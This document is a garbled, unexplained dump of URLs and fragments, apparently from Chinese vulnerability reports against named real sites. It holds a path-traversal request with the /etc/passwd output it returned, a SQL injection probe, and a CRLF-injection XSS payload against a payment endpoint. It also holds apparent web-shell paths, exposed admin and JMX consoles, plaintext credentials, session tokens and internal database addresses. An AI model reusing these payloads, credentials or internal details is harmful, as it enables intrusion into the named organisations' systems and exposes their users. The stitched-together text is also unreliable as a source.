exim:x:93:93::/var/spool/exim:/sbin/nologin amanda:x:33:6:Amanda user:/var/lib/amanda:/bin/bash mailman:x:41:41:GNU Manager:/usr/lib/mailman:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin ident:x:98:98::/:/sbin/nologin pegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologin tomcat:x:91:91:Tomcat:/usr/share/tomcat5:/bin/sh lkkspp:x:500:500::/home/lkkspp:/bin/bash ronggenyou:x:0:0::/home/ronggenyou:/bin/bash 
http://**.**.**.**/Website/newsshow.jsp?id=346 http://ecshub.foxconn.com/System/RegistUser/RegistUserEdit.aspx?billno=USG201510300001 http://servexpress.digitalchina.com/sms/login.asp http://servexpress.digitalchina.com//sms/PwdExpired.asp http://servexpress.digitalchina.com/sms/change_inf.asp http://61.142.114.205/6.jsp http://61.142.114.197/4.jsp?o=vLogin http://61.142.114.203/3.jsp http://61.142.114.201/1.jsp http://61.142.114.199/5.jsp http://www.jftzf.com/business/search http://www.jftzf.com/product/index?area=15 https://app.travelsky.com/ad//webService/message/house.action http://bk.travelsky.com/ http://bk.travelsky.com/bkair/page/users/front/userLogin.jsp http://mapi.jiashuangkuaizi.com/public/development?bdid=563&sid=0 https://**.**.**.**/invoker/JMXInvokerServlet http://db.beijing.com.cn/nagiosql//index.php http://**.**.**.**/v6/get_user_home.php http://bm.chinabond.com.cn/bm/jsp/eixtremove.esp http://appstore.sugon.com/sugonstore/index.php?r=app/detail&id=68 http://ec.1jiajie.com http://ec.1jiajie.com/order/contract-order-view?cid=1265 http://hhb.yisence.cn:89/admin/admin_index.asp http://121.15.209.216/ http://ds34.digitalchina.com/surface/ http://**.**.**.**/login.html http://sjxy.ycu.jx.cn/upfiles/Media/d2.asp http://sjxy.ycu.jx.cn/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=File&CurrentFolder=%2F http://m4.xianguo.com/homeindex/list?cid=1&tagid=6_31 http://**.**.**.**/login.html http://365webcall.2office.cn/ http://www.kf5.com/resources/index/id/* http://www.brandwisdom.cn http://www.1510cloud.com/ www.1510cloud.com http://wmarxism.fudan.edu.cn/admin/login.aspx http://e.xbwl.cn/office!findOffice.action http://mju.ss.cqvip.com/user/blog_search.aspx?keywords=i&subid=0 http://www.changhongit.com/ https://124.205.58.242:8880/ https://app.travelsky.com/ad//webService/advert-activ/buyOrder.action http://www.feiren.com/ www.feiren.com http://202.100.226.94:7001 ip:202.105.46.58 bt:/var/www# 
http://**.**.**.**/codereceive.php?cid=1 http://**.**.**.**/codereceive.php?cid=1 http://fax.2office.cn http://www.gdsto.com.cn/ www.gdsto.com.cn http://*****ifeng.com/sale/search/24737/_/_/11_0_0_0_0_0_0_0_0_0_0_0_0_11.shtml?keyword=_** http://admin.xiaomm.com.cn/ http://admin.xiaomm.com.cn/default.aspx URL:http://**.**.**.**:9100/claimWeb/claimQuery.jsp http://www.wdhac.com.cn/xml/Cms_XML_GBK.jsp?optionalparam=-1&cf=3467&randomId=0.9538818406872451&actiontype=1&id=1201 www.inke.tv http://agent.sfn.cn/domain/list http://agent.sfn.cn http://app.oeeee.com/user/modify QVQmy57RWTPVf16LHm60DuYvgWTy58AUCs8XMArOFTlMkR4C9367W7RLstT:DbNPSF4hFw6lNUs http://**.**.**.**/zhhxpm/sys/Login_dologin.action http://**.**.**.**/oa/sys/Login_dologin.action http://**.**.**.**:8888/shssy/sys/Login_dologin.action http://**.**.**.**/pm/sys/Login_dologin.action http://**.**.**.**:8888/ http://**.**.**.**:8888 http://3g.jstv.com/server/SubjectDetail_common.aspx?action=more&callid=712_1453600588041&fanye=1&styleid=-1 http://bbs.cits.com.cn/easoa/themes/mskin/login/login.jsp http://bbs.cits.com.cn http://oa.meiyijia.com.cn:8010/c6/ZdyWeb/Kfpeixun/ http://boss.myj.com.cn/PersonalCenter/UploadUserTop.aspx www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com www.myj123.com http://kh.avicsec.com:8800/resin-doc/viewfile/?file=index.xtp http://kh.avicsec.com:8800/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://kh.avicsec.com:8800/resin-doc/doc/%20.xtp http://kh.avicsec.com:8800/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/classes/example/PeriodicTaskServlet.java http://210.21.204.105 http://apk.gfan.com/Product/App718165.html http://121.14.65.32:8080 URL:http://www.hcjdc.com/pop_shop.php?act=show_store&store_id=200%27%3B 
www2.kugou.kugou.com,但明显域名是cname在CDN节点了。 http://183.61.119.243/show/show/more/type=10&orderby=hits&page=1&page_size=24 http://**.**.**.**/ http://**.**.**.**/sms/toMain.action http://chongjian.cqu.edu.cn/bknews_view.php?titleid=1&id=347 http://wx.landray.com.cn http://202.98.11.145 http://pms.hengtech.com.cn/pms/ com:9704/115.231.105.61:9704就发现了weblogic是存在java反序列命令执行的 http://xdx.sinosafe.com.cn/webhelp/register/forgot_pwd.jsp#anchor_content http://**.**.**.**:8880/ http://**.**.**.**:8880/emptywar/f.jsp?o=vLogin http://agenttest.sinosafe.com.cn:8888/shop/member/findPwd/ http://58.251.33.183/ http://**.**.**/USMS/Default.aspx http://acc.rxdai.com:8585/EmployeeQuery/Login.aspx并没验证码之类的验证。想到top1的弱口令12456就拿出来配合跑了下。从以前的帖子里面找到了相关的账号,然后结合Burp跑下 http://sce.suning.com/ http://www.jaguar.com.cn/index.html http://113.54.11.225/ http://e.waimai.meituan.com/ http://e.meituan.com/ http://cssurvey.foxconn.com/admin/study.aspx http://www.kuwo.cn/cgi-bin/test-cgi http://yinyue.kuwo.cn/cgi-bin/test-cgi http://tupian.kuwo.cn/cgi-bin/test-cgi http://connect.qq.com/widget/shareqq/index.html?url=http://jump.qt.qq.com/php/jump/check_url/?url=http://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32 http://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g http://iufo.ldjt.com.cn http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../ http://iufo.ldjt.com.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../IBM/WebSphere/AppServer/web/mbeanDocs http://bbs.18touch.com http://club.jr.jd.com http://passport.18touch.com/findpwd http://passport.18touch.com/4056754 http://passport.18touch.com/4 http://202.120.146.49/tasi/main.asp?lang=gb http://**.**.**.**/bugs/wooyun-2010-0164727 https://**.**.**.**/maoshuai/study_python/blob/6becfa68acdf86bbe32efe8b879e8f3c2e5eab77/sendmail.py http://**.**.**.**/sungovnew/findpwd_next.do 
http://passport.18touch.com/ http://coehm.pw http://exmail.qq.com http://**.**.**.**/review.do?method=col&rid=39520 http://fax.2office.cn http://pay.cang.com/myhome/msg/msgRead.aspx http://pay.cang.com/myhome/msg/msgLists.aspx http://easternmiles.ceair.com/mpf/#/sign/signin site:dellrsm.com http://register.xiaoniu66.com:1088 http://**.**.**.**/hot.php?type=瀛﹂櫌绯诲垪 http://218.89.135.237:9000/hd/ passwd:shell!@# http://mobile.kuwo.cn/mpage/html5/message/action/messageaction.jsp?flag=1&index=201320&pn=0&rn=20 http://www.yn-jnd.com/ http://**.**.**.**/news.php?SysID=2012011021414516153302 http://www.junlebao.com/1.rar http://www.changan.com.cn/news/cadt/&year=2015 http://tra-b2g.ceair.com/v4/B2G/NoticeDetail.aspx?id=102 http://tools.2345.com/ http://www.jbh.com/ http://xyk.edai.com/xyk/shenqing/card/?cardId=2152, http://www.oracle.com/technetwork/java/javase/downloads/jre7-downloads-1880261.html http://**.**.**.**/main/home/index.shtml http://**.**.**.**/m1/login.do http://202.98.11.143:6001/ http://**.**.**.**/ http://**.**.**.** https://vpn.le.com http://**.**.**.**/gps/doif/main.jsp https://**.**.**.** http://www.chinanetwork.com.cn http://gxzyy.91huayi.com/report/publicedList.aspx?displayMode=1&frontForUnit=1&holdYear=1&lowUnitCode=01&principalName=oqsddcfv&projectCode=94102&projectKind=%C8%AB%B2%BF&projectName=lewrhkdl&publicBatch=-1&subject2=01&subject3=0101 https://iexam.h3c.com/customize/nwc_user_enterprise/login/login.html https://iexam.h3c.com/site/ajax/CommentAjax.aspx?type=webcomment&isFirstOpen=Y&contentUid=123 http://101.251.251.55:8080/login/index.html http://101.251.251.55:8080/.git/index http://101.251.251.55:8080/.git site:chetuan.com http://oa.chetuan.com/contract/login?data=eyd1c2VyaWQnOidQb2x5MDQxMScsJ3Rva2VuJzonNTcyMmY3OTg3NmJmZWM0YWQ1NGQ5ZWM3NGI3MTUxYjMnfQ== http://124.115.26.74/article?id=128&root=125 http://**.**.**.**/conference.aspx?id=239 cn:8888 url:http://www.taishanpic.com.cn/ebusiness/b2c/member/login.html 
http://101.231.244.195/tms/loginAction.action http://220.181.168.69/ http://assignment.cctv.com/card/home.jsp http://assignment.cctv.com/desk/ http://youth.hznu.edu.cn/list_all.php?classid=46 http://**.**.**/index.shtml http://**.**.**/uddiexplorer/wooyun.jsp http://www.sinofltt.com/swpx/indexActivity_activityInfo.action?activity.id=202 http://60.255.41.34:8080/dl_HD/ http://my.37.com/api/login.php?callback=jQuery18306346307694952913_1453864220307&action=login&login_account=zhourenfa&password=zhourenfa&ajax=0&remember_me=1&save_state=1<ype=1 fastcgi://127.0.0.1:9000 http://my.37.com/api/login.php?callback=jQuery18306346307694952913_1453864220307&action=login&login_account=zhourenfa&password=zhourenfa&ajax=0&remember_me=1&save_state=1<ype=1 http://www.dota2sp.com/ http://live.bilibili.com/i/operation?month=2016-01-01%2000:00:00 http://ceagent.ceair.com http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/license_201601261734 http://ceagent.ceair.com/ceagent/front/file/file-download!downloadFromServer.shtml?inputPath=/opt/appdata/file/ceagent/front/agency/../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:100:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin 
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin gdm:x:42:42::/var/gdm:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin hw:x:500:500:hw:/home/hw:/bin/bash was7:x:3011:301::/home/was7:/bin/bash rduser:x:2011:201::/home/rduser:/bin/bash itimadmin:x:11014:11014::/home/itimadmin:/bin/bash administrator:x:11016:11016::/home/administrator:/bin/bash etdftp:x:11017:11017::/home/etdftp:/bin/bash ora11g:x:11018:11018::/home/ora11g:/bin/bash yxuser:x:11019:11019::/home/yxuser:/bin/bash wang_yl:x:10001:400::/home/wang_yl:/bin/bash zyjin:x:10002:400::/home/zyjin:/bin/bash zhoujie:x:10003:400::/home/zhoujie:/bin/bash apwang:x:10004:400::/home/apwang:/bin/bash yaohy:x:10005:400::/home/yaohy:/bin/bash huangqin:x:10006:400::/home/huangqin:/bin/bash yongzhou:x:10007:400::/home/yongzhou:/bin/bash yxhuang:x:10008:400::/home/yxhuang:/bin/bash wtliu:x:10009:400::/home/wtliu:/bin/bash zytao:x:10010:400::/home/zytao:/bin/bash cjchen:x:10012:400::/home/cjchen:/bin/bash jjjin:x:10013:400::/home/jjjin:/bin/bash huanglei1:x:10014:400::/home/huanglei1:/bin/bash zhangjinliang:x:10015:400::/home/zhangjinliang:/bin/bash yuegao:x:10016:400::/home/yuegao:/bin/bash observer:x:2013:201::/home/observer:/bin/bash rdsys:x:2015:201::/home/rdsys:/bin/bash http://www.changhongit.com/ http://124.205.58.251/ www.veryeast.cn 
http://www.veryeast.cn/dpo.asp?syskey=8aa23d80e90edb83&uid=2398089&username=123456&password=123456&ticket=cb5aessVpnvHyNDOuivKyBSETf%2BQYY4hO6u8EQNLfuIqRNZ1HYJNoHxou1cnBPRF2jgRatF%2FY%2FJRBcWyxBkI&CookieDate=1&_=1453867475427 URL:https://www.chinalife.com.cn/online/web/user/reset/resetPassword.jsp http://union.2345.com/jifen/mall/index.php?category=&priceArea=&sendto=1%27%20and%20%271%27=%271 http://jinmi8.com http://img.jinmi8.com/jmimg/logopic/T.asp;201612701926742.jpg https://www.dnspod.cn/Auth/Login http://218.25.161.204:1080/dlkj_server/ http://218.25.161.204:1080/web-console http://218.25.161.204:1080/jmx-console http://218.25.161.204:1080/invoker/JMXInvokerServlet http://union.mumayi.com/index.php?s=/Data/showdata http://218.25.115.4:8080/ipegasus/tologin.do http://66hl.cn/ http://update.tl.sohu.com/tlbb/loginserver.txt http://**.**.**.**:8090/ http://huan.letao.com/wap/pay/address.aspx?tid=0&form=0&addressid=&aid=130706&cid=130700&pid=130000&uuid1453881206&add=&c=&op=newadd http://office.mingyi.com.cn/ http://office.mingyi.com.cn/txl/ http://interactive.huanqiu.com/.git/ http://www.openfind.com/ http://365webcall.2office.cn/ http://rank.4006666688.com/list/?subcgid=4 http://brand.4006666688.com/brandlist/?blimit=0 http://fax.2office.cn/showPublicImage.do?id=1&number=0 http://mobile.kuwo.cn/mpage/special/showSpecal.jsp?id=1320 http://bm.chinabond.com.cn http://bm.chinabond.com.cn/bm/jsp/updatepassword.esp https://github.com/boubei-com/wanma/blob/1cb81f4d8b003bac8a78880ad29182b3023e2270/note.txt http://www.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://tupian.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://huodong.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://yinyue.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://yule.kuwo.cn/p/mb/GetContent?from=mobile&id=123&mbuid=53036462 http://www.kf5.com/resources/index?id=2 http://www.kf5.com/resources/view/id/60/ 
http://www.kf5.com/resources/index/id/2 http://www.kf5.com/resources/view?id=60/ http://mail.12306.cn/app/mail/entry http://mail.12306.cn http://183.131.151.13:8080/imeeting_webinar_web/ http://183.131.151.13:8080/dmp_sys_web/ http://183.131.151.13:8088/ weixin.autohome.com.cn/WeiXinGame/ShowResult?username=test&guid=60dcaec0-86ac-466f-bfc2-3538738047eb URL:http://gms.csair.com http://gms.csair.com/app http://159.226.100.28:81/ http://kt.changhong.com/product/detail.php?id=10002 http://www.sheny.12306.cn/Dzsw/downLoad/Dzsw201311doc.doc http://medical.neusoft.com/WEB-INF/classes/ http://medical.neusoft.com/WEB-INF/classes/EAS.properties http://medical.neusoft.com/WEB-INF/classes/url.properties http://medical.neusoft.com/yd/new_upload/ http://wskh.avicsec.com/m1/login.do http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://oa.avicsec.com/web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://www.piao.com/index.php?app=cashier&order_id=70279&no_user=1 http://www.piao.com/index.php?app=cashier&order_id=1474&no_user=1 http://space.bilibili.com/ http://space.bilibili.com/ajax/fav/getBoxList?mid=4926267 http://202.98.11.144/ http://fs.foton.com.cn/login.do http://fs.foton.com.cn https://api.ffan.com/xadmin/login http://**.**.**/commons/sysuser.do http://116.255.254.185/login.php http://m.yicp.com/news/newslist.php?categoryId=15&pageNo=2 http://58.252.73.136:8000/ActivityStatistics.aspx(慧聪家电城的经营分析系统) http://www.chinanetwork.com.cn http://fax.2office.cn/teamindex.do?flag=showGroupInfo&groupid=4 http://oa.zjgjxt.com/中江国际信托OA使用培训PPT.ppt http://mail.zjgjxt.com/admin/main.php?seessid=f6d205885faf863d8bf1a3ada7ccb62b http://player.youku.com/embed/XMTQ1ODYyODYwNA== http://www.openfind.com/ http://service.chexun.com/ http://m.jiashuangkuaizi.com/activities/pugongying/invite?_=1453984661970 http://m.jiashuangkuaizi.com http://hq.guodu.com/hq/socketHQ.jsp) http://**.**.** http://gongyi.feidee.com/money/ 
http://gongyi.feidee.com/money/upload/icon/000/016/262/924/1453992768492.jsp jdbc:mysql://10.255.2.171:3088/money_lunch?autoReconnect=true&useUnicode=true&characterEncoding=utf-8 jdbc:oracle:thin:@**.**.**.**:1521:oracrm1 jdbc:oracle:thin:@**.**.**.**:1521:additdb jdbc:oracle:thin:@**.**.**.**:1531:orajf10 http://wooyun.org/bugs/wooyun-2010-0141195 index.php/Public/dologin https://plmyun.joyoung.com http://**.**.**.**/news.asp?SysID=2006122192921144710719 http://kyc.chsnenu.edu.cn/administrators/login.asp http://kyc.chsnenu.edu.cn/kycg.asp http://www.changan.com.cn/commonweal/gaxd/&year=2015 http://www.changan.com.cn/news/zthd/&year=2015 http://www.changan.com.cn/news/mtzs/&year=2015 https://github.com/chenshiyang2015/tools/blob/ce3f14b9356d480218a1a7a126eb790e479d77c2/pysms.py http://web.lmobile.cn/平台 https://gms.gfan.com http://gms.gfan.com:8080/loginAction.do?method=login&password=admin&username=admin com:8080 http://magazine.99ys.com/hdbox.php?id=5285&page=1 https://wt1.guodu.com/trade/index.jsp http://www.sunnyoptical.com/jobs_info.html?t=0&pk=1001A11000000001EFF3 http://mk.2000tuan.com/coupon3.7/view/android/startupad.php http://cence.d1net.com/index.php?m=live&c=index&id=25 http://**.**.**.**/TopMall/WEB-INF/web.xml http://**.**.**.**/.viminfo http://**.**.**.**/nginx154/conf/nginx.conf http://**.**.**.**/apache/conf/httpd.conf http://**.**.**.**/.bash_history http://**.**.**.**/nginx154/logs/access.log http://oa1.hzrobam.com/ http://mail.xunlei.com/extmail/cgi/index.cgi http://iptv.cnpc.com.cn/css_edit/css.php http://iptv.cnpc.com.cn/css_edit/someclass.php http://**.**.**/gameing.phpurl=http%3A%2F%2Fs1.ebogame.yjxy.mlong.cn_ http://**.**.**/codereceive.phpcid=2545_ http://**.**.**/news.phpcontentid=2296_ http://**.**.**/news.phpcontentid=1407 http://**.**.**/caches/configs/database.php http://sglj.ebogame.com/log.txt http://ebo.ebogame.com/log.txt http://www.ebogame.com/log.txt http://crm.isimcere.com:7380/OnDemand/loginAction.action 
http://edit.buding.cn:8983/solr/ http://dynamic.m.tuniu.com/event/lottery/opeLottery/lotteryAndSendAjax?tel=18605050505&actId=100&mark=jdwxhb&offCode=&type=1&one=1 http://wx.cntv.cn/mp/login.html http://wx.cntv.cn/pannel.html,也是能一窥后台全貌的 http://tc.homelink.com.cn/Academy/AcademyCertificateCourseReg05.aspx https://github.com/xiebaochun/notepad/blob/e5a76c7bd07871737b434a498d5e667da7a4ad0f/qipao_doc http://qipaobbs.91qipao.com/api/app/index_api.php?page='+topic_page svn://120.131.81.217/qipao_bbs svn://120.131.81.217/qipao_shop svn://120.131.81.217/www_neng123_com/trunk svn://120.131.81.217/qipao_tools/trunk http://www.umeng.com/ http://shuangbbs.xingkec.com/forum.php http://shuang.xingkec.com/admin/index.php http://we.onexin.com/?mod=bigdata http://qipaobbs.91qipao.com/forum.php http://adshop.91qipao.com/admin/privilege.php?act=login http://we.onexin.com/?mod=bigdata ip:120.131.81.41 http://meeting.oppo.com/ http://meeting.oppo.com/SaleStat/ http://meeting.wanda.com.cn:18080/Conf/jsp/main/mainAction.do https://oa.weidai.com.cn,两个端口的地方 https://github.com/starkwang/FDU-MailHelper/blob/e7ad516d9ce4349a6865bb1da858a1668a3f30fb/index.js http://m.chinaxinge.com/android/xh_so.asp?keyword=-1 http://58.255.193.196/ http://uc.imbatv.cn http://supplier.ext.jumei.com/index.php?r=site/login&?request_uri=https%3A%2F%2Fv.jumei.com&uid=2939&access_token=db5eb2abab5130f7b86748add4ada19a&language=zh http://app.cheshi.com/substation/ad.php?province=21&city=299&pid=1* htttp://help.chinaxinge.com http://tc.changhong.com/inspection/jc.aspx?type=physicochemistry http://x.kuwo.cn/cgi-bin/test-cgi url:http://211.140.20.69:8080/cx/index.php http://www.bgy.cn/ http://218.104.169.74:8080/ http://testlink.foxitsoftware.cn/firstLogin.php http://101.198.156.146:6001/ http://manage.ikuai8.com/User/findPwd/step/1 http://manage.ikuai8.com/User/findPwd/step/3/token/7d74fbaabcb45be65973600d5d25d13e/encode/rrqJkrN2gKuFm7RhsHt-nw 
http://manage.ikuai8.com/User/findPwd/step/3/token/7d74fbaabcb45be65973600d5d25d13e/encode/rrqJkrN2gKuFm7RhsHt-nw float:right float:right;clear:both http://dx.ikuai8.com/admin/ htttp://jlb.chinaxinge.com B4F90A5BF8824E23427C93D9FFFA0F8B:FG=1 http://www.gamh.com.cn/gamadmin/ http://www.gamh.com.cn/english/huojiangmulu.asp?Info_Type_Name=Scientific%20Achievement&Info_Type_Code=20 https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0d%0a%0d%0a https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0d%0aContent-Length:60%0d%0a%0d%0a%3Cimg%20src=1%3E https://wx.tenpay.com/cgi-bin/mmpayweb-bin/balanceuserrollbatch?exportkey=&pass_ticket=a%0D%0AContent-Length:120%0D%0AContent-Type:text/html;%20charset=ISO-2022-JP%0D%0A%0D%0A%3Cimg%20src=x%20on%1B%28Jerror=al%1B%28Jert%28document.domain%29%3E X-XSS-Protection:0关闭浏览器的XSS过滤,想执行什么的代码发现被拦截了就用M神的方式bypass。 www.mkzhan.com http://www.mkzhan.com/api/vipmag3/1.html http://xssnow.com/F8UN http://xssnow.com/F8UN site:17k.com http://dealer.youxinpai.com https://link.zhihu.com/?target=http://a.zhchbin.xyz http://serverfault.com/questions/520244/referer-is-passed-from-https-to-http-in-some-cases-how https://api.weibo.com/oauth2/authorize?scope=email&state=e9887b485320b0cab80b0d029e92759f&redirect_uri=https%3A%2F%2Fwww.zhihu.com%2Foauth%2Fcallback%2Flogin%2Fsina&response_type=code&client_id=3063806388 http://open.weibo.com/wiki/Oauth2/authorize https://api.weibo.com/oauth2/authorize?scope=email&state=e9887b485320b0cab80b0d029e92759f&redirect_uri=http%3A%2F%2Flink.zhihu.com%2F%3Ftarget%3Dhttp%3A%2F%2Fa.zhchbin.xyz%2Fauth%3F&response_type=code&client_id=3063806388 https://github.com/fengxing888851/data/blob/a3c73ba29f230c29fd177c819b4c861c718ba29a/python/send.py http://www.sxdachang.com:80/voting.zip http://218.94.147.86:81/oceanserver/ http://222.73.243.136/main/index.jsp 
http://training.changhong.com/ http://www.gvsun.net:6180/property/property/main/main.jsp?url=../housing/searchHousing.jsp http://himilk.mengniu.com.cn/weixin/buyAction!toWeixinPay.action?userId=19212&orderNo=wxf140269ed975a9891454253405&price=2880.0&sendTime1=2016-3-5&code=03187e31c2aeb1d3277722808ffb574Z&state=STATE http://himilk.mengniu.com.cn/weixin/buyAction!toWeixinPay.action?userId=19212&orderNo=wxf140269ed975a9891454253405&price=1.0&sendTime1=2016-3-5&code=03187e31c2aeb1d3277722808ffb574Z&state=STATE http://me.waimai.sankuai.com/washData/list http://navs.map.qq.com/ https://github.com/kdyq007/work/blob/db64c7b909be19423b839182d7b2a14e215aa03a/%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BF%A1%E6%81%AF.txt http://netclass.csu.edu.cn/Video/video/video.aspx?CoursewareID=17 www.jiashuangkuaizi.com www.jiashuangkuaizi.com com:8089 http://crs.bgyhotel.com:8089 http://webpager.renren.com/api/getChatList?lt=15&st=0&type=0&roomId=874460788 http://m.91yao.com/ http://m.91yao.com/Order/ordershow/orderid/4279,发现订单可遍历 https://github.com/zhangxiaocenfoxmail/Python_MySQLd/blob/39edcf37ecd9db38d2b36bff5dcabc3c98b2c256/select.py http://www.changan.com.cn/humanresource/rczp/zpgg/&year=2015 http://www.jiashuangkuaizi.com.cn/Index/join http://**.**.**/ http://**.**.**/bea_wls_internal/wooyun.jsp jdbc:oracle:thin:@10.106.0.13:1521:tclcss http://www.dfsyqc.com/ www.dfsyqc.com http://wh.ougz.com.cn:81/网站用了dede程序 http://webapp.zs91.com/ http://game.kuwo.cn/cgi-bin/test-cgi https://api-cust.ayibang.com/v1/pay/wx/sign https://api-cust.ayibang.com/v1/order/detail?orderID=11291191 https://api-cust.ayibang.com/v1/order/cancel https://api-cust.ayibang.com/v1/order/cancel https://api-cust.ayibang.com/v1/house/delete?houseID=17334752 https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 https://api-cust.ayibang.com/v1/house/delete?houseID=17336562 https://api-cust.ayibang.com/v1/house/delete?houseID=17330512 http://fax.2office.cn/public.do?id=32&num=1 http://www.yonyougov.com:7001 
http://ws.shangdu.com/phpmyadmin/ user:root pass:root http://game.shangdu.com/ http://game.shangdu.com/homeimages/autoChangeImages.js/%20\0.php http://game.shangdu.com/homeimages/autoChangeImages.js/a.php http://www.yonyougov.com:8080 jobzpgl.swufe.edu.cn/RCPT/Pub01/ArticleDetail.aspx?ID=1 http://fax.2office.cn/teamindex.do?flag=teamlist&groupname=%B9%BA%CE%EF%27 http://baike.chinaxinge.com/improve.asp?fid=13 http://baike.chinaxinge.com/hotword.asp?fid=1 http://baike.chinaxinge.com/searchlist.asp?keyword=1 http://service.yonyou.com/ http://www.goldmail.cn/learning/list.php?NewsType=jsyd http://www.enkj.com/autosite/modelCreate.aspx?pcmb=g&tpl_domain=http://design-57.view.websiteonline.cn&tpl_id=6151&tpl_pic_big=http://screenshots.websiteonline.cn/screenshots/design-57-b.jpg&tpl_price=99.00 http://images.kumi.cn/include/config.inc.php URL:http://www.muyingzhijia.com/forgetpassword.aspx http://olms.sinopec.com/slmwebapp/ http://219.143.118.51:80/invoker/JMXInvokerServlet index.php/Home/Scene/showSceneDetail?sceneid=1333&userid=nine.twelve@foxmail.com http://ec.sinopec.com/supp/index.shtml com:9001/fileuploadAction.do?method=downLoad&fjmc=.xml&fileType=application/pdf&fjbh=web&fjml=/WEB-INF/ com:9001/fileuploadAction.do?method=downLoad&fjmc=.properties&fileType=application/pdf&fjbh=webservicedb&fjml=/usr/suppregwebapp/DefaultWebApp/WEB-INF/classes/ http://219.143.118.177:9001/logonAction.do http://**.**.**.**/bugs/wooyun-2015-0157346提及的cookie伪造登录成功登录系统,同时发现登录可以任意命令执行。 http://xxxxxxxxxxxx/cgi-bin/snmpManager.cgi?cgimodule=home_page http://app.api.muyingzhijia.com/v1/GetUserIdentity http://**.**.**.**/ file:/E:/exlive/gserver/jboss-5.1.0/ file:/E:/exlive/gserver/jboss-5.1.0/server/ file:/D:/exlive/gserver/jboss-5.1.0/server/ file:/F:/exlive/gserver/jboss-5.1.0/server/ file:/E:/exlive/gserver/jboss-5.1.0/server/ http://yyxy.hznu.edu.cn/news.asp http://**.**.**.**/bugs/wooyun-2013-024919 http://**.**.**.**/bugs/wooyun-2016-0174251 
http://ka.cwan.com/extend_tao.php?aid=583440'报错 http://a.cheshi.com/seller/0200/map.php?brandshop=1&city=0&id=0&idstr=1&prov=0 http://www.kfc.com.cn/service/log.txt http://m.muyingzhijia.com/ http://vip.api.muyingzhijia.com/json/reply/QueryMemberAddressRequest http://m.muyingzhijia.com http://www.hecom.cn/selcity.php?add1=268 dicc.ins24.com/ah/policies/1001210072 http://www.guangzh.12306.cn/Dzsw/downLoad/kfczzzbl.pdf http://www.heinz.com.cn/naifen/parenting/c/*.html http://map.hznu.edu.cn/Handler/BusLineSeach.ashx?cmd=GetBusLine&Linenum=-1 http://map.hznu.edu.cn/Handler/LCDWinfo.ashx?cmd=GetAll&MOID=4&X=38143&Y=32888&_=1454165087652 http://webapp.zs91.com/ http://m.chinaxinge.com/android/def_bk.asp?keyword=e http://m.chinaxinge.com/android/bkview.asp?id=4178 http://www.hlslm.cn/ www.acunetix-referrer.com/javascript%253AdomxssExecutionSink%25280%252C%2522%2527%255C%2522%253E%253Cxsstag%253E%2528%2529refdxss%2522%2529%2Cr%3A%2Cmon%3Ahttp%3A//m154.looyu.com/monitor 